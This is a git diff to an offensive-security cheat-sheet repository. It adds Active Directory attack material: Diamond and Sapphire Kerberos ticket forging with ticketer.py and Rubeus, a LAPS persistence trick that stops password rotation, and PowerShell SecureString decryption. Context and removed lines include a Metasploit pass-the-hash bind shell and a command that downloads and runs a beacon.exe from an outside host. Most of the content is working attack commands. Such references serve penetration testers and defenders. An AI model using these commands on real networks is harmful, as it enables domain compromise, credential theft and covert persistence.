diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 40625c9..0878006 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -56,6 +56,8 @@ - [Using Meterpreter](#using-meterpreter) - [Using a ticket on Linux](#using-a-ticket-on-linux) - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) + - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets) + - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krbasrep-roasting) - [Pass-the-Hash](#pass-the-hash) @@ -1605,9 +1607,11 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred - ### Pass-the-Ticket Golden Tickets -Forging a TGT require the `krbtgt` NTLM hash +Forging a TGT require: +* the `krbtgt` NT hash +* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations -> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. #### Using Mimikatz @@ -1708,6 +1712,38 @@ Interesting services to target with a silver ticket : Mitigations: * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + +### Pass-the-Ticket Diamond Tickets + +> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key + +Require: +* krbtgt NT Hash +* krbtgt AES key + +```ps1 +ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' + +Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS +``` + + +### Pass-the-Ticket Sapphire Tickets + +> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). + +The goal is to mimic the PAC field as close as possible to a legitimate one. + +Require: +* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) +* krbtgt AES key + +```ps1 +# baduser argument will be ignored +ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' +``` + + ### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) @@ -1862,7 +1898,7 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since set SMBUser jarrieta set SMBPass nastyCutt3r # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. - # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -1893,7 +1929,7 @@ $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ### OverPass-the-Hash (pass the key) -In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT). +In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). #### Using impacket @@ -3993,3 +4029,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) * [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) +* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) +* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) +* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5793abc..26fba39 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -588,6 +588,14 @@ kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-20 kerberos::tgt ``` +### LAPS Persistence + +To prevent a machine to update its LAPS password, it is possible to set the update date in the futur. + +```ps1 +Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"} +``` + ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index c7a5b3c..a2abf5a 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,9 +9,10 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit---smb) * [Metasploit - Psexec](#metasploit---psexec) -* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [WinRM](#winrm) * [Powershell Remoting](#powershell-remoting) + * [Powershell Credentials](#powershell-credentials) + * [Powershell Secure String](#powershell-secure-strings) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) @@ -121,16 +122,6 @@ root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3 root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' ``` -## Remote Code Execution with PS Credentials - -```powershell -PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force -PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) -PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} -PS C:\> New-PSSESSION -NAME PSDC -ComputerName COMPUTER01; Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {whoami} -PS C:\> Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {powershell Invoke-WebRequest -Uri 'http://10.10.10.10/beacon.exe' -OutFile 'C:\Temp\beacon.exe'; Start-Process -wait C:\Temp\beacon.exe} -``` - ## WinRM Require: @@ -173,7 +164,6 @@ conn.shell(:powershell) do |shell| end ``` - ## Powershell Remoting > PSSESSION @@ -201,6 +191,23 @@ PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service } PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1 ``` +### Powershell Credentials + +```ps1 +PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force +PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass) +``` + +### Powershell Secure String + +```ps1 +$aesKey = (49, 222, 253, 86, 26, 137, 92, 43, 29, 200, 17, 203, 88, 97, 39, 38, 60, 119, 46, 44, 219, 179, 13, 194, 191, 199, 78, 10, 4, 40, 87, 159) +$secureObject = ConvertTo-SecureString -String "76492d11167[SNIP]MwA4AGEAYwA1AGMAZgA=" -Key $aesKey +$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject) +$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted) +$decrypted +``` + ## Winexe